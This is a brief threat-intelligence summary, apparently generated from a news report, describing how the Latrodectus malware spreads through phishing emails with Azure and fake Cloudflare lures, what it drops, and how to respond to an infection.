April 30, 2024 at 06:15PM
The Latrodectus malware is being distributed through phishing emails using Microsoft Azure and Cloudflare lures to appear legitimate and evade security software. This Windows malware downloader, linked to the IcedID malware developers, is increasingly used for phishing campaigns, contact form spam, and initial corporate network access. Infections can lead to various malware drops, necessitating immediate system evaluation.
Key Takeaways from the Meeting Notes:
1. Latrodectus malware is being distributed in phishing campaigns using Microsoft Azure and Cloudflare lures to appear legitimate and evade email security platforms.
2. It acts as a backdoor, downloading additional EXE and DLL payloads or executing commands, and it is increasingly being used in phishing campaigns and contact form spam to gain initial access to corporate networks.
3. The malware is linked to the developers of IcedID modular malware loader, and it is being distributed through reply-chain phishing emails using PDF attachments or embedded URLs to initiate attacks.
4. The PDFs use generic names and pretend to be documents hosted in Microsoft Azure cloud, leading to a fake Cloudflare security check to prevent security software from easily following the attack chain.
5. When the correct answer is entered into the fake Cloudflare captcha, a JavaScript file is downloaded, which then downloads an MSI file from a hardcoded URL.
6. Upon installation, the MSI file drops a DLL, which is the Latrodectus malware, and it quietly runs in the background waiting for payloads to install or commands to execute.
7. The malware has been observed dropping the Lumma information-stealer and Danabot, and it could lead to a wider range of malware in the future, such as Cobalt Strike, and partnerships with ransomware gangs.
8. If a device becomes infected with Latrodectus, it is critical to take the system offline as soon as possible and evaluate the network for unusual behavior.